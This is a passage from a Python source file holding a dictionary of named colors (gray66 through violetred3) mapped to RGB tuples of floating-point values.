'gray66': (0.6588235294117647, 0.6588235294117647, 0.6588235294117647),
'gray67': (0.6705882352941176, 0.6705882352941176, 0.6705882352941176),
'gray68': (0.6784313725490196, 0.6784313725490196, 0.6784313725490196),
'gray69': (0.6901960784313725, 0.6901960784313725, 0.6901960784313725),
'gray7': (0.07058823529411765, 0.07058823529411765, 0.07058823529411765),
'gray70': (0.7019607843137254, 0.7019607843137254, 0.7019607843137254),
'gray71': (0.7098039215686275, 0.7098039215686275, 0.7098039215686275),
'gray72': (0.7215686274509804, 0.7215686274509804, 0.7215686274509804),
'gray73': (0.7294117647058823, 0.7294117647058823, 0.7294117647058823),
'gray74': (0.7411764705882353, 0.7411764705882353, 0.7411764705882353),
'gray75': (0.7490196078431373, 0.7490196078431373, 0.7490196078431373),
'gray76': (0.7607843137254902, 0.7607843137254902, 0.7607843137254902),
'gray77': (0.7686274509803922, 0.7686274509803922, 0.7686274509803922),
'gray78': (0.7803921568627451, 0.7803921568627451, 0.7803921568627451),
'gray79': (0.788235294117647, 0.788235294117647, 0.788235294117647),
'gray8': (0.0784313725490196, 0.0784313725490196, 0.0784313725490196),
'gray80': (0.8, 0.8, 0.8),
'gray81': (0.8117647058823529, 0.8117647058823529, 0.8117647058823529),
'gray82': (0.8196078431372549, 0.8196078431372549, 0.8196078431372549),
'gray83': (0.8313725490196079, 0.8313725490196079, 0.8313725490196079),
'gray84': (0.8392156862745098, 0.8392156862745098, 0.8392156862745098),
'gray85': (0.8509803921568627, 0.8509803921568627, 0.8509803921568627),
'gray86': (0.8588235294117647, 0.8588235294117647, 0.8588235294117647),
'gray87': (0.8705882352941177, 0.8705882352941177, 0.8705882352941177),
'gray88': (0.8784313725490196, 0.8784313725490196, 0.8784313725490196),
'gray89': (0.8901960784313725, 0.8901960784313725, 0.8901960784313725),
'gray9': (0.09019607843137255, 0.09019607843137255, 0.09019607843137255),
'gray90': (0.8980392156862745, 0.8980392156862745, 0.8980392156862745),
'gray91': (0.9098039215686274, 0.9098039215686274, 0.9098039215686274),
'gray92': (0.9215686274509803, 0.9215686274509803, 0.9215686274509803),
'gray93': (0.9294117647058824, 0.9294117647058824, 0.9294117647058824),
'gray94': (0.9411764705882353, 0.9411764705882353, 0.9411764705882353),
'gray95': (0.9490196078431372, 0.9490196078431372, 0.9490196078431372),
'gray96': (0.9607843137254902, 0.9607843137254902, 0.9607843137254902),
'gray97': (0.9686274509803922, 0.9686274509803922, 0.9686274509803922),
'gray98': (0.9803921568627451, 0.9803921568627451, 0.9803921568627451),
'gray99': (0.9882352941176471, 0.9882352941176471, 0.9882352941176471),
'green': (0.0, 1.0, 0.0),
'green1': (0.0, 1.0, 0.0),
'green2': (0.0, 0.9333333333333333, 0.0),
'green3': (0.0, 0.803921568627451, 0.0),
'green4': (0.0, 0.5450980392156862, 0.0),
'greenyellow': (0.6784313725490196, 1.0, 0.1843137254901961),
'grey': (0.7450980392156863, 0.7450980392156863, 0.7450980392156863),
'grey0': (0.0, 0.0, 0.0),
'grey1': (0.011764705882352941, 0.011764705882352941, 0.011764705882352941),
'grey10': (0.10196078431372549, 0.10196078431372549, 0.10196078431372549),
'grey100': (1.0, 1.0, 1.0),
'grey11': (0.10980392156862745, 0.10980392156862745, 0.10980392156862745),
'grey12': (0.12156862745098039, 0.12156862745098039, 0.12156862745098039),
'grey13': (0.12941176470588237, 0.12941176470588237, 0.12941176470588237),
'grey14': (0.1411764705882353, 0.1411764705882353, 0.1411764705882353),
'grey15': (0.14901960784313725, 0.14901960784313725, 0.14901960784313725),
'grey16': (0.1607843137254902, 0.1607843137254902, 0.1607843137254902),
'grey17': (0.16862745098039217, 0.16862745098039217, 0.16862745098039217),
'grey18': (0.1803921568627451, 0.1803921568627451, 0.1803921568627451),
'grey19': (0.18823529411764706, 0.18823529411764706, 0.18823529411764706),
'grey2': (0.0196078431372549, 0.0196078431372549, 0.0196078431372549),
'grey20': (0.2, 0.2, 0.2),
'grey21': (0.21176470588235294, 0.21176470588235294, 0.21176470588235294),
'grey22': (0.2196078431372549, 0.2196078431372549, 0.2196078431372549),
'grey23': (0.23137254901960785, 0.23137254901960785, 0.23137254901960785),
'grey24': (0.23921568627450981, 0.23921568627450981, 0.23921568627450981),
'grey25': (0.25098039215686274, 0.25098039215686274, 0.25098039215686274),
'grey26': (0.25882352941176473, 0.25882352941176473, 0.25882352941176473),
'grey27': (0.27058823529411763, 0.27058823529411763, 0.27058823529411763),
'grey28': (0.2784313725490196, 0.2784313725490196, 0.2784313725490196),
'grey29': (0.2901960784313726, 0.2901960784313726, 0.2901960784313726),
'grey3': (0.03137254901960784, 0.03137254901960784, 0.03137254901960784),
'grey30': (0.30196078431372547, 0.30196078431372547, 0.30196078431372547),
'grey31': (0.30980392156862746, 0.30980392156862746, 0.30980392156862746),
'grey32': (0.3215686274509804, 0.3215686274509804, 0.3215686274509804),
'grey33': (0.32941176470588235, 0.32941176470588235, 0.32941176470588235),
'grey34': (0.3411764705882353, 0.3411764705882353, 0.3411764705882353),
'grey35': (0.34901960784313724, 0.34901960784313724, 0.34901960784313724),
'grey36': (0.3607843137254902, 0.3607843137254902, 0.3607843137254902),
'grey37': (0.3686274509803922, 0.3686274509803922, 0.3686274509803922),
'grey38': (0.3803921568627451, 0.3803921568627451, 0.3803921568627451),
'grey39': (0.38823529411764707, 0.38823529411764707, 0.38823529411764707),
'grey4': (0.0392156862745098, 0.0392156862745098, 0.0392156862745098),
'grey40': (0.4, 0.4, 0.4),
'grey41': (0.4117647058823529, 0.4117647058823529, 0.4117647058823529),
'grey42': (0.4196078431372549, 0.4196078431372549, 0.4196078431372549),
'grey43': (0.43137254901960786, 0.43137254901960786, 0.43137254901960786),
'grey44': (0.4392156862745098, 0.4392156862745098, 0.4392156862745098),
'grey45': (0.45098039215686275, 0.45098039215686275, 0.45098039215686275),
'grey46': (0.4588235294117647, 0.4588235294117647, 0.4588235294117647),
'grey47': (0.47058823529411764, 0.47058823529411764, 0.47058823529411764),
'grey48': (0.47843137254901963, 0.47843137254901963, 0.47843137254901963),
'grey49': (0.49019607843137253, 0.49019607843137253, 0.49019607843137253),
'grey5': (0.050980392156862744, 0.050980392156862744, 0.050980392156862744),
'grey50': (0.4980392156862745, 0.4980392156862745, 0.4980392156862745),
'grey51': (0.5098039215686274, 0.5098039215686274, 0.5098039215686274),
'grey52': (0.5215686274509804, 0.5215686274509804, 0.5215686274509804),
'grey53': (0.5294117647058824, 0.5294117647058824, 0.5294117647058824),
'grey54': (0.5411764705882353, 0.5411764705882353, 0.5411764705882353),
'grey55': (0.5490196078431373, 0.5490196078431373, 0.5490196078431373),
'grey56': (0.5607843137254902, 0.5607843137254902, 0.5607843137254902),
'grey57': (0.5686274509803921, 0.5686274509803921, 0.5686274509803921),
'grey58': (0.5803921568627451, 0.5803921568627451, 0.5803921568627451),
'grey59': (0.5882352941176471, 0.5882352941176471, 0.5882352941176471),
'grey6': (0.058823529411764705, 0.058823529411764705, 0.058823529411764705),
'grey60': (0.6, 0.6, 0.6),
'grey61': (0.611764705882353, 0.611764705882353, 0.611764705882353),
'grey62': (0.6196078431372549, 0.6196078431372549, 0.6196078431372549),
'grey63': (0.6313725490196078, 0.6313725490196078, 0.6313725490196078),
'grey64': (0.6392156862745098, 0.6392156862745098, 0.6392156862745098),
'grey65': (0.6509803921568628, 0.6509803921568628, 0.6509803921568628),
'grey66': (0.6588235294117647, 0.6588235294117647, 0.6588235294117647),
'grey67': (0.6705882352941176, 0.6705882352941176, 0.6705882352941176),
'grey68': (0.6784313725490196, 0.6784313725490196, 0.6784313725490196),
'grey69': (0.6901960784313725, 0.6901960784313725, 0.6901960784313725),
'grey7': (0.07058823529411765, 0.07058823529411765, 0.07058823529411765),
'grey70': (0.7019607843137254, 0.7019607843137254, 0.7019607843137254),
'grey71': (0.7098039215686275, 0.7098039215686275, 0.7098039215686275),
'grey72': (0.7215686274509804, 0.7215686274509804, 0.7215686274509804),
'grey73': (0.7294117647058823, 0.7294117647058823, 0.7294117647058823),
'grey74': (0.7411764705882353, 0.7411764705882353, 0.7411764705882353),
'grey75': (0.7490196078431373, 0.7490196078431373, 0.7490196078431373),
'grey76': (0.7607843137254902, 0.7607843137254902, 0.7607843137254902),
'grey77': (0.7686274509803922, 0.7686274509803922, 0.7686274509803922),
'grey78': (0.7803921568627451, 0.7803921568627451, 0.7803921568627451),
'grey79': (0.788235294117647, 0.788235294117647, 0.788235294117647),
'grey8': (0.0784313725490196, 0.0784313725490196, 0.0784313725490196),
'grey80': (0.8, 0.8, 0.8),
'grey81': (0.8117647058823529, 0.8117647058823529, 0.8117647058823529),
'grey82': (0.8196078431372549, 0.8196078431372549, 0.8196078431372549),
'grey83': (0.8313725490196079, 0.8313725490196079, 0.8313725490196079),
'grey84': (0.8392156862745098, 0.8392156862745098, 0.8392156862745098),
'grey85': (0.8509803921568627, 0.8509803921568627, 0.8509803921568627),
'grey86': (0.8588235294117647, 0.8588235294117647, 0.8588235294117647),
'grey87': (0.8705882352941177, 0.8705882352941177, 0.8705882352941177),
'grey88': (0.8784313725490196, 0.8784313725490196, 0.8784313725490196),
'grey89': (0.8901960784313725, 0.8901960784313725, 0.8901960784313725),
'grey9': (0.09019607843137255, 0.09019607843137255, 0.09019607843137255),
'grey90': (0.8980392156862745, 0.8980392156862745, 0.8980392156862745),
'grey91': (0.9098039215686274, 0.9098039215686274, 0.9098039215686274),
'grey92': (0.9215686274509803, 0.9215686274509803, 0.9215686274509803),
'grey93': (0.9294117647058824, 0.9294117647058824, 0.9294117647058824),
'grey94': (0.9411764705882353, 0.9411764705882353, 0.9411764705882353),
'grey95': (0.9490196078431372, 0.9490196078431372, 0.9490196078431372),
'grey96': (0.9607843137254902, 0.9607843137254902, 0.9607843137254902),
'grey97': (0.9686274509803922, 0.9686274509803922, 0.9686274509803922),
'grey98': (0.9803921568627451, 0.9803921568627451, 0.9803921568627451),
'grey99': (0.9882352941176471, 0.9882352941176471, 0.9882352941176471),
'honeydew': (0.9411764705882353, 1.0, 0.9411764705882353),
'honeydew1': (0.9411764705882353, 1.0, 0.9411764705882353),
'honeydew2': (0.8784313725490196, 0.9333333333333333, 0.8784313725490196),
'honeydew3': (0.7568627450980392, 0.803921568627451, 0.7568627450980392),
'honeydew4': (0.5137254901960784, 0.5450980392156862, 0.5137254901960784),
'hotpink': (1.0, 0.4117647058823529, 0.7058823529411765),
'hotpink1': (1.0, 0.43137254901960786, 0.7058823529411765),
'hotpink2': (0.9333333333333333, 0.41568627450980394, 0.6549019607843137),
'hotpink3': (0.803921568627451, 0.3764705882352941, 0.5647058823529412),
'hotpink4': (0.5450980392156862, 0.22745098039215686, 0.3843137254901961),
'indianred': (0.803921568627451, 0.3607843137254902, 0.3607843137254902),
'indianred1': (1.0, 0.41568627450980394, 0.41568627450980394),
'indianred2': (0.9333333333333333, 0.38823529411764707, 0.38823529411764707),
'indianred3': (0.803921568627451, 0.3333333333333333, 0.3333333333333333),
'indianred4': (0.5450980392156862, 0.22745098039215686, 0.22745098039215686),
'ivory': (1.0, 1.0, 0.9411764705882353),
'ivory1': (1.0, 1.0, 0.9411764705882353),
'ivory2': (0.9333333333333333, 0.9333333333333333, 0.8784313725490196),
'ivory3': (0.803921568627451, 0.803921568627451, 0.7568627450980392),
'ivory4': (0.5450980392156862, 0.5450980392156862, 0.5137254901960784),
'khaki': (0.9411764705882353, 0.9019607843137255, 0.5490196078431373),
'khaki1': (1.0, 0.9647058823529412, 0.5607843137254902),
'khaki2': (0.9333333333333333, 0.9019607843137255, 0.5215686274509804),
'khaki3': (0.803921568627451, 0.7764705882352941, 0.45098039215686275),
'khaki4': (0.5450980392156862, 0.5254901960784314, 0.3058823529411765),
'lavender': (0.9019607843137255, 0.9019607843137255, 0.9803921568627451),
'lavenderblush': (1.0, 0.9411764705882353, 0.9607843137254902),
'lavenderblush1': (1.0, 0.9411764705882353, 0.9607843137254902),
'lavenderblush2': (0.9333333333333333,
0.8784313725490196,
0.8980392156862745),
'lavenderblush3': (0.803921568627451, 0.7568627450980392, 0.7725490196078432),
'lavenderblush4': (0.5450980392156862,
0.5137254901960784,
0.5254901960784314),
'lawngreen': (0.48627450980392156, 0.9882352941176471, 0.0),
'lemonchiffon': (1.0, 0.9803921568627451, 0.803921568627451),
'lemonchiffon1': (1.0, 0.9803921568627451, 0.803921568627451),
'lemonchiffon2': (0.9333333333333333, 0.9137254901960784, 0.7490196078431373),
'lemonchiffon3': (0.803921568627451, 0.788235294117647, 0.6470588235294118),
'lemonchiffon4': (0.5450980392156862, 0.5372549019607843, 0.4392156862745098),
'lightblue': (0.6784313725490196, 0.8470588235294118, 0.9019607843137255),
'lightblue1': (0.7490196078431373, 0.9372549019607843, 1.0),
'lightblue2': (0.6980392156862745, 0.8745098039215686, 0.9333333333333333),
'lightblue3': (0.6039215686274509, 0.7529411764705882, 0.803921568627451),
'lightblue4': (0.40784313725490196, 0.5137254901960784, 0.5450980392156862),
'lightcoral': (0.9411764705882353, 0.5019607843137255, 0.5019607843137255),
'lightcyan': (0.8784313725490196, 1.0, 1.0),
'lightcyan1': (0.8784313725490196, 1.0, 1.0),
'lightcyan2': (0.8196078431372549, 0.9333333333333333, 0.9333333333333333),
'lightcyan3': (0.7058823529411765, 0.803921568627451, 0.803921568627451),
'lightcyan4': (0.47843137254901963, 0.5450980392156862, 0.5450980392156862),
'lightgoldenrod': (0.9333333333333333,
0.8666666666666667,
0.5098039215686274),
'lightgoldenrod1': (1.0, 0.9254901960784314, 0.5450980392156862),
'lightgoldenrod2': (0.9333333333333333,
0.8627450980392157,
0.5098039215686274),
'lightgoldenrod3': (0.803921568627451,
0.7450980392156863,
0.4392156862745098),
'lightgoldenrod4': (0.5450980392156862,
0.5058823529411764,
0.2980392156862745),
'lightgoldenrodyellow': (0.9803921568627451,
0.9803921568627451,
0.8235294117647058),
'lightgray': (0.8274509803921568, 0.8274509803921568, 0.8274509803921568),
'lightgreen': (0.5647058823529412, 0.9333333333333333, 0.5647058823529412),
'lightgrey': (0.8274509803921568, 0.8274509803921568, 0.8274509803921568),
'lightpink': (1.0, 0.7137254901960784, 0.7568627450980392),
'lightpink1': (1.0, 0.6823529411764706, 0.7254901960784313),
'lightpink2': (0.9333333333333333, 0.6352941176470588, 0.6784313725490196),
'lightpink3': (0.803921568627451, 0.5490196078431373, 0.5843137254901961),
'lightpink4': (0.5450980392156862, 0.37254901960784315, 0.396078431372549),
'lightsalmon': (1.0, 0.6274509803921569, 0.47843137254901963),
'lightsalmon1': (1.0, 0.6274509803921569, 0.47843137254901963),
'lightsalmon2': (0.9333333333333333, 0.5843137254901961, 0.4470588235294118),
'lightsalmon3': (0.803921568627451, 0.5058823529411764, 0.3843137254901961),
'lightsalmon4': (0.5450980392156862, 0.3411764705882353, 0.25882352941176473),
'lightseagreen': (0.12549019607843137,
0.6980392156862745,
0.6666666666666666),
'lightskyblue': (0.5294117647058824, 0.807843137254902, 0.9803921568627451),
'lightskyblue1': (0.6901960784313725, 0.8862745098039215, 1.0),
'lightskyblue2': (0.6431372549019608, 0.8274509803921568, 0.9333333333333333),
'lightskyblue3': (0.5529411764705883, 0.7137254901960784, 0.803921568627451),
'lightskyblue4': (0.3764705882352941, 0.4823529411764706, 0.5450980392156862),
'lightslateblue': (0.5176470588235295, 0.4392156862745098, 1.0),
'lightslategray': (0.4666666666666667, 0.5333333333333333, 0.6),
'lightslategrey': (0.4666666666666667, 0.5333333333333333, 0.6),
'lightsteelblue': (0.6901960784313725,
0.7686274509803922,
0.8705882352941177),
'lightsteelblue1': (0.792156862745098, 0.8823529411764706, 1.0),
'lightsteelblue2': (0.7372549019607844,
0.8235294117647058,
0.9333333333333333),
'lightsteelblue3': (0.6352941176470588,
0.7098039215686275,
0.803921568627451),
'lightsteelblue4': (0.43137254901960786,
0.4823529411764706,
0.5450980392156862),
'lightyellow': (1.0, 1.0, 0.8784313725490196),
'lightyellow1': (1.0, 1.0, 0.8784313725490196),
'lightyellow2': (0.9333333333333333, 0.9333333333333333, 0.8196078431372549),
'lightyellow3': (0.803921568627451, 0.803921568627451, 0.7058823529411765),
'lightyellow4': (0.5450980392156862, 0.5450980392156862, 0.47843137254901963),
'limegreen': (0.19607843137254902, 0.803921568627451, 0.19607843137254902),
'linen': (0.9803921568627451, 0.9411764705882353, 0.9019607843137255),
'magenta': (1.0, 0.0, 1.0),
'magenta1': (1.0, 0.0, 1.0),
'magenta2': (0.9333333333333333, 0.0, 0.9333333333333333),
'magenta3': (0.803921568627451, 0.0, 0.803921568627451),
'magenta4': (0.5450980392156862, 0.0, 0.5450980392156862),
'maroon': (0.6901960784313725, 0.18823529411764706, 0.3764705882352941),
'maroon1': (1.0, 0.20392156862745098, 0.7019607843137254),
'maroon2': (0.9333333333333333, 0.18823529411764706, 0.6549019607843137),
'maroon3': (0.803921568627451, 0.1607843137254902, 0.5647058823529412),
'maroon4': (0.5450980392156862, 0.10980392156862745, 0.3843137254901961),
'mediumaquamarine': (0.4, 0.803921568627451, 0.6666666666666666),
'mediumblue': (0.0, 0.0, 0.803921568627451),
'mediumorchid': (0.7294117647058823, 0.3333333333333333, 0.8274509803921568),
'mediumorchid1': (0.8784313725490196, 0.4, 1.0),
'mediumorchid2': (0.8196078431372549,
0.37254901960784315,
0.9333333333333333),
'mediumorchid3': (0.7058823529411765, 0.3215686274509804, 0.803921568627451),
'mediumorchid4': (0.47843137254901963,
0.21568627450980393,
0.5450980392156862),
'mediumpurple': (0.5764705882352941, 0.4392156862745098, 0.8588235294117647),
'mediumpurple1': (0.6705882352941176, 0.5098039215686274, 1.0),
'mediumpurple2': (0.6235294117647059, 0.4745098039215686, 0.9333333333333333),
'mediumpurple3': (0.5372549019607843, 0.40784313725490196, 0.803921568627451),
'mediumpurple4': (0.36470588235294116,
0.2784313725490196,
0.5450980392156862),
'mediumseagreen': (0.23529411764705882,
0.7019607843137254,
0.44313725490196076),
'mediumslateblue': (0.4823529411764706,
0.40784313725490196,
0.9333333333333333),
'mediumspringgreen': (0.0, 0.9803921568627451, 0.6039215686274509),
'mediumturquoise': (0.2823529411764706, 0.8196078431372549, 0.8),
'mediumvioletred': (0.7803921568627451,
0.08235294117647059,
0.5215686274509804),
'midnightblue': (0.09803921568627451,
0.09803921568627451,
0.4392156862745098),
'mintcream': (0.9607843137254902, 1.0, 0.9803921568627451),
'mistyrose': (1.0, 0.8941176470588236, 0.8823529411764706),
'mistyrose1': (1.0, 0.8941176470588236, 0.8823529411764706),
'mistyrose2': (0.9333333333333333, 0.8352941176470589, 0.8235294117647058),
'mistyrose3': (0.803921568627451, 0.7176470588235294, 0.7098039215686275),
'mistyrose4': (0.5450980392156862, 0.49019607843137253, 0.4823529411764706),
'moccasin': (1.0, 0.8941176470588236, 0.7098039215686275),
'navajowhite': (1.0, 0.8705882352941177, 0.6784313725490196),
'navajowhite1': (1.0, 0.8705882352941177, 0.6784313725490196),
'navajowhite2': (0.9333333333333333, 0.8117647058823529, 0.6313725490196078),
'navajowhite3': (0.803921568627451, 0.7019607843137254, 0.5450980392156862),
'navajowhite4': (0.5450980392156862, 0.4745098039215686, 0.3686274509803922),
'navy': (0.0, 0.0, 0.5019607843137255),
'navyblue': (0.0, 0.0, 0.5019607843137255),
'oldlace': (0.9921568627450981, 0.9607843137254902, 0.9019607843137255),
'olivedrab': (0.4196078431372549, 0.5568627450980392, 0.13725490196078433),
'olivedrab1': (0.7529411764705882, 1.0, 0.24313725490196078),
'olivedrab2': (0.7019607843137254, 0.9333333333333333, 0.22745098039215686),
'olivedrab3': (0.6039215686274509, 0.803921568627451, 0.19607843137254902),
'olivedrab4': (0.4117647058823529, 0.5450980392156862, 0.13333333333333333),
'orange': (1.0, 0.6470588235294118, 0.0),
'orange1': (1.0, 0.6470588235294118, 0.0),
'orange2': (0.9333333333333333, 0.6039215686274509, 0.0),
'orange3': (0.803921568627451, 0.5215686274509804, 0.0),
'orange4': (0.5450980392156862, 0.35294117647058826, 0.0),
'orangered': (1.0, 0.27058823529411763, 0.0),
'orangered1': (1.0, 0.27058823529411763, 0.0),
'orangered2': (0.9333333333333333, 0.25098039215686274, 0.0),
'orangered3': (0.803921568627451, 0.21568627450980393, 0.0),
'orangered4': (0.5450980392156862, 0.1450980392156863, 0.0),
'orchid': (0.8549019607843137, 0.4392156862745098, 0.8392156862745098),
'orchid1': (1.0, 0.5137254901960784, 0.9803921568627451),
'orchid2': (0.9333333333333333, 0.47843137254901963, 0.9137254901960784),
'orchid3': (0.803921568627451, 0.4117647058823529, 0.788235294117647),
'orchid4': (0.5450980392156862, 0.2784313725490196, 0.5372549019607843),
'palegoldenrod': (0.9333333333333333, 0.9098039215686274, 0.6666666666666666),
'palegreen': (0.596078431372549, 0.984313725490196, 0.596078431372549),
'palegreen1': (0.6039215686274509, 1.0, 0.6039215686274509),
'palegreen2': (0.5647058823529412, 0.9333333333333333, 0.5647058823529412),
'palegreen3': (0.48627450980392156, 0.803921568627451, 0.48627450980392156),
'palegreen4': (0.32941176470588235, 0.5450980392156862, 0.32941176470588235),
'paleturquoise': (0.6862745098039216, 0.9333333333333333, 0.9333333333333333),
'paleturquoise1': (0.7333333333333333, 1.0, 1.0),
'paleturquoise2': (0.6823529411764706,
0.9333333333333333,
0.9333333333333333),
'paleturquoise3': (0.5882352941176471, 0.803921568627451, 0.803921568627451),
'paleturquoise4': (0.4, 0.5450980392156862, 0.5450980392156862),
'palevioletred': (0.8588235294117647, 0.4392156862745098, 0.5764705882352941),
'palevioletred1': (1.0, 0.5098039215686274, 0.6705882352941176),
'palevioletred2': (0.9333333333333333,
0.4745098039215686,
0.6235294117647059),
'palevioletred3': (0.803921568627451,
0.40784313725490196,
0.5372549019607843),
'palevioletred4': (0.5450980392156862,
0.2784313725490196,
0.36470588235294116),
'papayawhip': (1.0, 0.9372549019607843, 0.8352941176470589),
'peachpuff': (1.0, 0.8549019607843137, 0.7254901960784313),
'peachpuff1': (1.0, 0.8549019607843137, 0.7254901960784313),
'peachpuff2': (0.9333333333333333, 0.796078431372549, 0.6784313725490196),
'peachpuff3': (0.803921568627451, 0.6862745098039216, 0.5843137254901961),
'peachpuff4': (0.5450980392156862, 0.4666666666666667, 0.396078431372549),
'peru': (0.803921568627451, 0.5215686274509804, 0.24705882352941178),
'pink': (1.0, 0.7529411764705882, 0.796078431372549),
'pink1': (1.0, 0.7098039215686275, 0.7725490196078432),
'pink2': (0.9333333333333333, 0.6627450980392157, 0.7215686274509804),
'pink3': (0.803921568627451, 0.5686274509803921, 0.6196078431372549),
'pink4': (0.5450980392156862, 0.38823529411764707, 0.4235294117647059),
'plum': (0.8666666666666667, 0.6274509803921569, 0.8666666666666667),
'plum1': (1.0, 0.7333333333333333, 1.0),
'plum2': (0.9333333333333333, 0.6823529411764706, 0.9333333333333333),
'plum3': (0.803921568627451, 0.5882352941176471, 0.803921568627451),
'plum4': (0.5450980392156862, 0.4, 0.5450980392156862),
'powderblue': (0.6901960784313725, 0.8784313725490196, 0.9019607843137255),
'purple': (0.6274509803921569, 0.12549019607843137, 0.9411764705882353),
'purple1': (0.6078431372549019, 0.18823529411764706, 1.0),
'purple2': (0.5686274509803921, 0.17254901960784313, 0.9333333333333333),
'purple3': (0.49019607843137253, 0.14901960784313725, 0.803921568627451),
'purple4': (0.3333333333333333, 0.10196078431372549, 0.5450980392156862),
'red': (1.0, 0.0, 0.0),
'red1': (1.0, 0.0, 0.0),
'red2': (0.9333333333333333, 0.0, 0.0),
'red3': (0.803921568627451, 0.0, 0.0),
'red4': (0.5450980392156862, 0.0, 0.0),
'rosybrown': (0.7372549019607844, 0.5607843137254902, 0.5607843137254902),
'rosybrown1': (1.0, 0.7568627450980392, 0.7568627450980392),
'rosybrown2': (0.9333333333333333, 0.7058823529411765, 0.7058823529411765),
'rosybrown3': (0.803921568627451, 0.6078431372549019, 0.6078431372549019),
'rosybrown4': (0.5450980392156862, 0.4117647058823529, 0.4117647058823529),
'royalblue': (0.2549019607843137, 0.4117647058823529, 0.8823529411764706),
'royalblue1': (0.2823529411764706, 0.4627450980392157, 1.0),
'royalblue2': (0.2627450980392157, 0.43137254901960786, 0.9333333333333333),
'royalblue3': (0.22745098039215686, 0.37254901960784315, 0.803921568627451),
'royalblue4': (0.15294117647058825, 0.25098039215686274, 0.5450980392156862),
'saddlebrown': (0.5450980392156862, 0.27058823529411763, 0.07450980392156863),
'salmon': (0.9803921568627451, 0.5019607843137255, 0.4470588235294118),
'salmon1': (1.0, 0.5490196078431373, 0.4117647058823529),
'salmon2': (0.9333333333333333, 0.5098039215686274, 0.3843137254901961),
'salmon3': (0.803921568627451, 0.4392156862745098, 0.32941176470588235),
'salmon4': (0.5450980392156862, 0.2980392156862745, 0.2235294117647059),
'sandybrown': (0.9568627450980393, 0.6431372549019608, 0.3764705882352941),
'seagreen': (0.1803921568627451, 0.5450980392156862, 0.3411764705882353),
'seagreen1': (0.32941176470588235, 1.0, 0.6235294117647059),
'seagreen2': (0.3058823529411765, 0.9333333333333333, 0.5803921568627451),
'seagreen3': (0.2627450980392157, 0.803921568627451, 0.5019607843137255),
'seagreen4': (0.1803921568627451, 0.5450980392156862, 0.3411764705882353),
'seashell': (1.0, 0.9607843137254902, 0.9333333333333333),
'seashell1': (1.0, 0.9607843137254902, 0.9333333333333333),
'seashell2': (0.9333333333333333, 0.8980392156862745, 0.8705882352941177),
'seashell3': (0.803921568627451, 0.7725490196078432, 0.7490196078431373),
'seashell4': (0.5450980392156862, 0.5254901960784314, 0.5098039215686274),
'sienna': (0.6274509803921569, 0.3215686274509804, 0.17647058823529413),
'sienna1': (1.0, 0.5098039215686274, 0.2784313725490196),
'sienna2': (0.9333333333333333, 0.4745098039215686, 0.25882352941176473),
'sienna3': (0.803921568627451, 0.40784313725490196, 0.2235294117647059),
'sienna4': (0.5450980392156862, 0.2784313725490196, 0.14901960784313725),
'skyblue': (0.5294117647058824, 0.807843137254902, 0.9215686274509803),
'skyblue1': (0.5294117647058824, 0.807843137254902, 1.0),
'skyblue2': (0.49411764705882355, 0.7529411764705882, 0.9333333333333333),
'skyblue3': (0.4235294117647059, 0.6509803921568628, 0.803921568627451),
'skyblue4': (0.2901960784313726, 0.4392156862745098, 0.5450980392156862),
'slateblue': (0.41568627450980394, 0.35294117647058826, 0.803921568627451),
'slateblue1': (0.5137254901960784, 0.43529411764705883, 1.0),
'slateblue2': (0.47843137254901963, 0.403921568627451, 0.9333333333333333),
'slateblue3': (0.4117647058823529, 0.34901960784313724, 0.803921568627451),
'slateblue4': (0.2784313725490196, 0.23529411764705882, 0.5450980392156862),
'slategray': (0.4392156862745098, 0.5019607843137255, 0.5647058823529412),
'slategray1': (0.7764705882352941, 0.8862745098039215, 1.0),
'slategray2': (0.7254901960784313, 0.8274509803921568, 0.9333333333333333),
'slategray3': (0.6235294117647059, 0.7137254901960784, 0.803921568627451),
'slategray4': (0.4235294117647059, 0.4823529411764706, 0.5450980392156862),
'slategrey': (0.4392156862745098, 0.5019607843137255, 0.5647058823529412),
'snow': (1.0, 0.9803921568627451, 0.9803921568627451),
'snow1': (1.0, 0.9803921568627451, 0.9803921568627451),
'snow2': (0.9333333333333333, 0.9137254901960784, 0.9137254901960784),
'snow3': (0.803921568627451, 0.788235294117647, 0.788235294117647),
'snow4': (0.5450980392156862, 0.5372549019607843, 0.5372549019607843),
'springgreen': (0.0, 1.0, 0.4980392156862745),
'springgreen1': (0.0, 1.0, 0.4980392156862745),
'springgreen2': (0.0, 0.9333333333333333, 0.4627450980392157),
'springgreen3': (0.0, 0.803921568627451, 0.4),
'springgreen4': (0.0, 0.5450980392156862, 0.27058823529411763),
'steelblue': (0.27450980392156865, 0.5098039215686274, 0.7058823529411765),
'steelblue1': (0.38823529411764707, 0.7215686274509804, 1.0),
'steelblue2': (0.3607843137254902, 0.6745098039215687, 0.9333333333333333),
'steelblue3': (0.30980392156862746, 0.5803921568627451, 0.803921568627451),
'steelblue4': (0.21176470588235294, 0.39215686274509803, 0.5450980392156862),
'tan': (0.8235294117647058, 0.7058823529411765, 0.5490196078431373),
'tan1': (1.0, 0.6470588235294118, 0.30980392156862746),
'tan2': (0.9333333333333333, 0.6039215686274509, 0.28627450980392155),
'tan3': (0.803921568627451, 0.5215686274509804, 0.24705882352941178),
'tan4': (0.5450980392156862, 0.35294117647058826, 0.16862745098039217),
'thistle': (0.8470588235294118, 0.7490196078431373, 0.8470588235294118),
'thistle1': (1.0, 0.8823529411764706, 1.0),
'thistle2': (0.9333333333333333, 0.8235294117647058, 0.9333333333333333),
'thistle3': (0.803921568627451, 0.7098039215686275, 0.803921568627451),
'thistle4': (0.5450980392156862, 0.4823529411764706, 0.5450980392156862),
'tomato': (1.0, 0.38823529411764707, 0.2784313725490196),
'tomato1': (1.0, 0.38823529411764707, 0.2784313725490196),
'tomato2': (0.9333333333333333, 0.3607843137254902, 0.25882352941176473),
'tomato3': (0.803921568627451, 0.30980392156862746, 0.2235294117647059),
'tomato4': (0.5450980392156862, 0.21176470588235294, 0.14901960784313725),
'turquoise': (0.25098039215686274, 0.8784313725490196, 0.8156862745098039),
'turquoise1': (0.0, 0.9607843137254902, 1.0),
'turquoise2': (0.0, 0.8980392156862745, 0.9333333333333333),
'turquoise3': (0.0, 0.7725490196078432, 0.803921568627451),
'turquoise4': (0.0, 0.5254901960784314, 0.5450980392156862),
'violet': (0.9333333333333333, 0.5098039215686274, 0.9333333333333333),
'violetred': (0.8156862745098039, 0.12549019607843137, 0.5647058823529412),
'violetred1': (1.0, 0.24313725490196078, 0.5882352941176471),
'violetred2': (0.9333333333333333, 0.22745098039215686, 0.5490196078431373),
'violetred3': (0.803921568627451, 0.19607843137254902, 0.47058823529411764),
